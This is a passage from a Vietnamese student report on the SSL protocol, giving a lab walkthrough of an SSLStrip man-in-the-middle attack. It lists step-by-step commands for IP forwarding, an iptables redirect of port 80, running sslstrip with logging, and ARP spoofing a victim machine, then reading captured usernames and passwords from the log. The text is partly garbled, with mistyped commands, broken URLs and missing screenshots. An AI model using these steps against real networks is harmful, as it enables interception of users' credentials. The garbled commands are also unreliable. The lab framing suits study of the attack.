Giới thiệu về SSLstrip

Một phần của tài liệu Tìm hiêu giao thức SSL và thực hiện mô phỏng tấn công SSLStrip (Trang 32 - 36)

SSLstrip là công cụ tương tác ở quá trình chuyển từ http sang https của các ứng dụng web. SSL strip là 1 công cụ hữu hiệu để capture được username/password login của các ứng dụng web.

SSL Trip được cài sẵn trong backtrack5.

2. Yêu cầu

1. Máy thật hoặc máy ảo Win XP hoặc Win 7 để làm nạn nhân 2. Máy ảo backtrack 5 RC2/3 (máy ảo), đã cài sẵn SSLstrip. Nếu

chưa cài được SSL strip :

Xem thư mục :

Cài đặt :

Lưu ý : phải cấu hình máy ảo dạng Bridged ( Network Adapter = Bridged ) để cùng mạng.

3. Tiến hành

Sử dụng máy windows XP làm máy victim (nạn nhân) có địa chỉ IP

192.168.137.168 default gateway 192.168.137.1, máy tấn công

backtrack có IP 192.168.137.130

Bước 1 : Trên attacker , ta bật enable chức năng IPv4 forward . Để tiến hành ARP poisoning :

Bước 2 : dùng IPtables để chuyển cất cả gói tin TCP ở port 80 sang port bất kì, ở đây ta chọn port 8 08 0. Port này là port listen của ssl strip sau này

Iptables –t nat –A FREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080

Bước 3 : chạy sslstrip listen ở port đã chọn ở trên (port 80 8 0) :

• Cd sslstrip-0.9

• Sslstrip –w logfilẹlog –l 8080

Bước 4 : Tiến hành arpspoof ( giả mạo địa chỉ MAC máy victim) :

• Với máy victim IP 192.168.137.168 và default gateway là 192.168.137.1 ta gõ lệnh

Arpspoof –i eth0 –t 192.168.137.168 192.168.137.1 Iptables –t nat –A PREROUTING –p tcp –destination –port 80 –j REDIRECT –-to-port <listenPort>

Bước 5 : Trên máy nạn nhân :

Arpspoof thành công địa chỉ MAC của default gateway và máy hacker có cùng MAC (118,200)

Bước 6 : Trên máy nạn nhân thực hiện các thao tác trên nền web (http port 80) và kiểm tra xem kết quả ở file filelog.log

Ta dùng lệnh : cat filelog.log để mở file và xem dữ liệu username và password của nạn nhân

Hoặc ta cũng có thể mở file trực tiếp : vào Places – Home Folder sau đó mở

Tài liệu tham khảọ1. http://doc.edụvn/tai-lieu/bao-cao-tim-hieu-giao-thuc-ssl-tls-cach-tan- 1. http://doc.edụvn/tai-lieu/bao-cao-tim-hieu-giao-thuc-ssl-tls-cach-tan- cong-va-phong-chong-7627/ 2. http://doc.edụvn/tai-lieu/do-an-nghien-cuu-ve-ssl-va-ung-dung-cua-ssl- trong-bao-mat-web-7783/ 3. http://www.slidesharẹnet/conglongit90/giao-thc-bo-mt-ssl 4. http://text.123doc.org/document/2236870-do-an-mon-ba-o-ma-t-thong-

Một phần của tài liệu Tìm hiêu giao thức SSL và thực hiện mô phỏng tấn công SSLStrip (Trang 32 - 36)

Tải bản đầy đủ (DOCX)

(37 trang)
w